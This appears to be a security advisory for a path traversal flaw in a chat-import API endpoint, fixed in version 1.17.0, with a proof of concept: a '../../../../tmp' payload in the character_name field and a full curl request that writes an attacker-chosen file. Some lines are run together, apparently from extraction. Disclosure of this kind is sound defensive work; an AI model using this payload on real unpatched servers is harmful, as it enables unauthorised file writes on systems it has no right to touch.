A path traversal vulnerability in /api/chats/import allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into character_name.
character_name is used unsafely as part of the destination filename and then passed into path.join(...) without sanitization.
Evidence:
character_name used in output filename:Example payload:
character_name=../../../../tmp/st_pocThis causes the final destination path to escape from <user>/chats/<avatar>/... and write to an attacker-controlled location such as /tmp/... (or any writable path for the service account).
Prerequisites:
cookie.txt)$TOKEN)Prepare payload:
printf '{"user_name":"u","chat_metadata":{}}\n{"name":"u","mes":"owned"}\n' >/tmp/poc.jsonl
Trigger arbitrary write:
curl -b cookie.txt -H "x-csrf-token: $TOKEN" \
-F "avatar=@/tmp/poc.jsonl" \
-F "file_type=jsonl" \
-F "avatar_url=a.png" \
-F "character_name=../../../../tmp/st_poc" \
-F "user_name=u" \
http://TARGET:8000/api/chats/import
Observed result:
/tmp/st_poc - <timestamp> imported.jsonlThe issue was addressed in version 1.17.0
{
"cwe_ids": [
"CWE-22",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:36:40Z",
"nvd_published_at": "2026-04-02T18:16:29Z",
"severity": "HIGH"
}